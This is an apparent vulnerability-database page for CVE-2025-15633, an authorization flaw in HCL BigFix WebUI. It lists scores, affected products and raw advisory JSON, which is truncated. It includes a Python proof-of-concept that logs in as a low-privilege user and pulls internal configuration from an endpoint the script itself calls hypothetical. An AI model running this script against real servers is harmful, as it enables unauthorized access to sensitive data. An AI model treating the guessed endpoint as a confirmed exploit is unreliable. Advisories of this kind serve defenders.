Security Vulnerability Report
中文
CVE-2025-15633 CVSS 6.5 MEDIUM

CVE-2025-15633

Published: 2026-05-09 06:16:07
Last Modified: 2026-05-14 20:28:21
Source: [email protected]

Description

An improper authorization vulnerability in HCL BigFix WebUI allows an authenticated user without Master Operator privileges to access internal data (site names, versions, and configuration variables) and bypass privilege requirements via unprotected endpoints lacking adequate security headers.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix WebUI (请参考官方公告KB0130587确认受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "https://bigfix-server.example.com" login_url = f"{target_host}/api/login" # Hypothetical vulnerable endpoint based on description vuln_url = f"{target_host}/api/internal/config" # Low-privileged credentials username = "testuser" password = "testpass" session = requests.Session() # 1. Authenticate to get session # Note: Adapt authentication method based on actual deployment auth_payload = {"username": username, "password": password} try: login_resp = session.post(login_url, data=auth_payload, verify=False) if login_resp.status_code != 200: print("Login failed") exit(1) except Exception as e: print(f"Connection error: {e}") exit(1) # 2. Exploit Authorization Bypass # The vulnerability allows access to internal data without Master Operator rights headers = { "User-Agent": "CVE-2025-15633-Scanner", "Accept": "application/json" } print(f"Attempting to access internal data: {vuln_url}") response = session.get(vuln_url, headers=headers, verify=False) if response.status_code == 200: print("[+] Successfully bypassed authorization!") print("[+] Sensitive Data Leaked:") print(response.text) else: print(f"[-] Failed. Status Code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15633", "sourceIdentifier": "[email protected]", "published": "2026-05-09T06:16:07.413", "lastModified": "2026-05-14T20:28:21.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authorization vulnerability in HCL BigFix WebUI allows an authenticated user without Master Operator privileges to access internal data (site names, versions, and configuration variables) and bypass privilege requirements via unprotected endpoints lacking adequate security headers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:*", "versionEndExcluding": "33", "matchCriteriaId": "8680650F-B404-4812-AD8D-F93A7F52C20B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:*", "versionEndExcluding": "40", "matchCriteriaId": "D8757E08-9B05-45FD-BEAC-7D27423C7FC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:*", "versionEndExcluding": "22", "matchCriteriaId": "DD60E500-25B7-42B4-8B0E-D84967B78AF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:*", "versionEndExcluding": "101", "matchCriteriaId": "E6441EA2-8CF7-4A3B-8AD8-BBE2A62E5DF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:*", "versionEndExcluding": "28", "matchCriteriaId": "CFE1EED8-C5C9-47CD-B20E-E5D113B4DF48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_custom:*:*:*:*:*:*:*:*", "versionEndExcluding": "50", "matchCriteriaId": "92437F31-8DD7-4440-AF6A-02B5DDA55A3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_data_sync:*:*:*:*:*:*:*:*", "versionEndExcluding": "37", "matchCriteriaId": "9F3C0E3C-1CE1-43FC-9B4C-8D0EE77E3E10"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_extensions:*:*:*:*:*:*:*:*", "versionEndExcluding": "14", "matchCriteriaId": "0F22F7CB-24CC-445F-87D9-CB0B4346401E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "35", "matchCriteriaId": "B7C2A16C-A840-47FF-9272-A17BD4CD7499"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_insights:*:*:*:*:*:*:*:*", "versionEndExcluding": "32", "matchCriteriaId": "97643BD1-2CE5-43A4-86C9-C25EE643E977"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_ivr:*:*:*:*:*:*:*:*", "versionEndExcluding": "23", "matchCriteriaId": "58DA2A15-7F8A-4D04-A158-18CBB803BF8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_mdm:*:*:*:*:*:*:*:*", "versionEndExcluding": "29", "matchCriteriaId": "A1287A97-8E7A-4B5F-BE14-2D871BD2E886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_pa ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.